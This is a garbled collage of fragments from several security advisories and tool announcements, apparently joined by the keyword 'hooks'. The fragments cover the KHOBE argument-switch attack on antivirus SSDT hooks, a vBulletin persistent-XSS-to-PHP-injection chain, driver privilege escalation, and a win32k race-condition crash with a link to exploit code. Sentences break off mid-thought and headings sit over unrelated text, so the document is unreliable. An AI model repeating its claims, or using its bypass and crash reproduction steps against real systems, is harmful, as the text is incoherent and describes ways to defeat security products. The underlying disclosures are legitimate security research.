hooks
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Insufficient argument validation of hooked SSDT functions
on multiple Antivirus and Firewalls
*Advisory Information*
We have found a number of vulnerabilities in implementations of kernel hooks in many different security products.
The argument-switch attack (or KHOBE attack) affects user mode and kernel mode hooks that are used to implement security features. The hook
may be vulnerable if it performs security checks on pointer or handle arguments that come from user mode. Using multiple threads, the
attacker is able to change the meaning of the arguments in the middle of the hooked system call and thus bypass the security checks
implemented by the hook. The common implementations of kernel mode hooks, especially so-called SSDT hooks, are vulnerable to the argument-switch
attack. None of the products that we investigated during our research implemented the hooks correctly.
Vulnerable software:
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
Now to address the quote "potential for exposure and damage is limited".
Clearly Jelsoft have never seen what one can do with an XSS. In this case
you have an unlimited and unaltered XSS space, so you're free to invoke some
AJAX and have fun. Just to give ideas on how this could turn into something
larger, vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:
What's uhooker?
A tool to intercept and manipulate execution of programs. It enables
the user to insert hooks in function calls and arbitrary addresses
within the executable file in memory. The hook handlers are written
in Python and can be changed at runtime without the need to restart
the inspected process.
Download:
http://oss.coresecurity.com/repo/SDTCleaner-v1.0.zip
What is the SDT Cleaner?
SDT Cleaner is a tool that intends to clean the SSDT (system service
descriptor table) from hooks.
* The SDT Cleaner allows you to clean hooks installed by Anti-Virus
and Firewalls.
* This little tool (in this first release) tries to collect info
from your current kernel and then switches to kernel land and if there
Immunity team is proud to present: Immunity Debugger 1.5
This new Immunity Debugger release provides a lot of new scripts and
important fixes. New scripts to improve your debugging experience
include: gflags, hookssl, and hookndr.
The API has been reinforced with new functionality which allows you to
gather more information from the remote process, such as Threads,
findRetValue. This release also includes some important fixes such as
correct Memory Page protection flags, which are also available via the
module.
o immlib.ps() returns two extra objects: the tcp list and the udp list
o immlib.getComment() now will try to fetch all types of comments
o Added new HOOKTYPE: PRE_BP_HOOK, hooks exactly before the breakpoint
is hit (Decoding events timeline)
o New Vista support for libheap
o Custom Tables has "Clear Window" menu now
o Added several methods from librecognize
Hello,
We have found a number of vulnerabilities in implementations of SSDT hooks in many different products.
Vulnerable software:
* BlackICE PC Protection 3.6.cqn
* G DATA InternetSecurity 2007
* Ghost Security Suite beta 1.110 and alpha 1.200
VULNERABILITIES DESCRIPTION AND TECHNICAL DETAILS:
---------------
SUPERAntiSpyware and Super Ad Blocker have almost identical device
drivers in order to set up hooks and perform other duties from kernel
space. These device drivers suffer from lack of validation of
parameters passed from user mode. Additionally, some of the functions
accessible from user mode are inherently insecure and lead to easy
privilege escalation. All vulnerabilities are applicable to both
applications.
The code injection is possible from a user restricted with minimum privileges.
The vulnerability is related to Pro-active Defense, specifically
the "Sub-control of Windows" event, which controls the
installation of hooks between applications; this event is
disabled by default when the antivirus is installed, allowing this breach of
security, because the protection does not verify it.
The vulnerability can be mitigated by activating the "Sub-control
of Windows" event.
In addition to these security fixes, other fixes have been included
such as:
- Fix crash on netfilter when nfnetlink_log is used on certain
hooks on packets forwarded to or from a bridge
- Fixed busy sleep on IPVS which caused high load averages
- Fixed possible race condition on ext[34]_link
- Fixed missing braces in condition block that led to wrong behaviour
in NFS
- Fixed XFS lock deallocation that resulted in oops when unmounting
// administrator.
//
// To uninstall, run "regsvr32 /u iebsfix1.dll".
//
// The DLL self-registers as a Browser Helper Object, but it
// doesn't actually do anything BHO-like -- it just hooks
// MSHTML.DLL during DllGetClassObject, then "fails." Being a
// BHO is a convenient way to get loaded into Internet Explorer.
// (Note that it may also load into Explorer.) If it can't
// hook the system's MSHTML.DLL, it will display a message box
// informing the user of the failure.
BSOD or hard system hang due to a race condition in the win32k.sys code that processes UnhookWindowsHookEx. Reproduced when a thread calls UnhookWindowsHookEx many times while, at the same time, the active window station desktop object is switched (SwitchDesktop) away from the desktop where the hooks are being unhooked and window messages are broadcast to windows on that desktop. Sample exploit code can be downloaded from: http://killprog.com/whk.zip Works on Win'2k3 and Vista. XP seems to be immune to this.
o Full debugger and GUI API access
o A flurry of cool example scripts such as:
- !heap A fully working heap dumping script (try the -d option!)
- !searchheap Searching the heap
- !hippie Trampoline hooks on RtlAllocateHeap/RtlFreeHeap
- !modptr Dynamic search for function pointers in pages
- !findantidep Find address to bypass software DEP
o Writing your own scripts for your specific tasks is easy :)
Respect.
What's the best way to actually test this when you don't have the hardware, you ask?
Dynamips [9] is the answer.
As long as the rootkit isn't too advanced and e.g. also hooks the write/copy
functions (e.g. an attacker could store the image diff on the system and play
a "proper" memory dump or proper IOS back when you write core/copy to TFTP) then
FX's CIR[7] is the forensics tool of choice. On platforms where the IOS image
is stored on an external flash card forensics may be easier.
mitigating the severity, as unlimited attack space can be obtained as shown above.
As per my last exploits, all XSS in the vBulletin ACP can be used for PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this particular XSS is persistent and will
render in all major browsers, it is particularly dangerous.
=======================================================================
- Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
- Log in as an unprivileged user.
- Run "dc2 /hct /a".
- Get BSODHook.exe from Matousec [3].
- Click on "Load Driver", then click on "Find SSDT hooks", then "Add to probe list", and then "GO".
*Report Timeline*